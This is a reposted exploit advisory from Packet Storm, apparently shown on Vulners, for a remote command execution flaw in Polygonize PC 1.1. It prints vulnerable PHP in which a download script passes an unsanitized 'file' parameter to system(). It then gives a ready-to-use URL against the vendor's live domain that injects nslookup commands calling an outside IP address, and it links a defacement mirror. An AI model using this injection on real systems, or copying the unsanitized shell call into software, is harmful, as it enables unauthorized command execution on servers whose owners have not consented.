Lucene search
K

Polygonize PC 1.1 Remote Command Execution

🗓️ 11 Jan 2018 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 36 Views

Polygonize PC 1.1 Remote Command Execution vulnerability in windows 10 FranASSai

Code
`============================================================================================================================  
| # Title : Polygonize PC v1.1 RCE Vulnerability |  
| # Author : indoushka |  
| # email : [email protected] |  
| # Tested on : windows 10 FranASSais V.(Pro) |  
| # Version : 1.1 |  
| # Vendor : http://polygonize.net/ |   
| # Dork : http://www.zone-h.org/mirror/id/30699471 |  
============================================================================================================================  
  
poc :  
  
<?  
/*************************************  
* Code to download JPGs, PDFs, etc  
* www.sometricks.com   
*************************************/  
$file = $_GET['file'];  
$file2 = "/var/www/cartoonize.net/web/tmp/".$_GET['file'];  
system("/usr/bin/composite -gravity SouthEast watermark.png $file $file");  
  
if(@is_array(getimagesize($file))){  
$image = true;  
} else {  
$image = false;  
}  
//print_r(getimagesize($file2));  
//exit();  
if ($image==true) {  
header ("Content-type: octet/stream");  
header ("Content-disposition: attachment; filename=".$file.";");  
header("Content-Length: ".filesize($file));  
readfile($file);  
}  
else echo "Wrong image type";  
exit;  
?>  
  
http://polygonize.net//download.php?file=nslookup%20213.32.6.8|nslookup%20213.32.6.8%26nslookup%20213.32.6.8  
  
  
Greetz :----------------------------------------------------------------------------------------  
|  
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |  
|  
================================================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation